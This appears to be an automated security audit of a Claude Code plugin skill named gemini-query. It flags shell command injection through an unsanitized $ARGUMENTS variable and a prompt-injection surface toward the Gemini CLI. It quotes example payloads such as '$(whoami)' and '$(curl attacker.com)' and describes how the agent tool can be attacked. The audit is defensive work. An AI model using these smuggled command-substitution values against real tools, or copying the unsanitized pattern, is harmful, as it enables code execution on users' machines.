Skills
skills/melodic-software/claude-code-plugins/gemini-query/Gen Agent Trust Hub

gemini-query

Warn

Audited by Gen Agent Trust Hub on Mar 28, 2026

Risk Level: MEDIUMCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill executes a Bash command that incorporates user-supplied arguments without sufficient sanitization.
  • Evidence: The line result=$(gemini "$ARGUMENTS" --output-format json 2>&1) in SKILL.md directly embeds the $ARGUMENTS variable.
  • Risk: In a Bash environment, double quotes do not prevent command substitution. An attacker providing a prompt such as $(whoami) or $(curl attacker.com) would cause the shell to execute those commands before passing the result to the gemini CLI tool.
  • [PROMPT_INJECTION]: The skill provides an interface for passing untrusted data to a downstream LLM (Gemini CLI), creating a surface for indirect prompt injection.
  • Ingestion points: The user-provided <prompt> is captured via the $ARGUMENTS variable in SKILL.md.
  • Boundary markers: Absent. The user input is passed directly as a positional argument without delimiters or instructions for the downstream tool to ignore embedded commands.
  • Capability inventory: The skill possesses the Bash tool capability, which is used to execute the query and parse the output using jq.
  • Sanitization: Absent. There is no escaping or validation of the user input before it is used in the shell command or sent to the model.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Mar 28, 2026, 05:24 AM
Security Audit — agent-trust-hub — gemini-query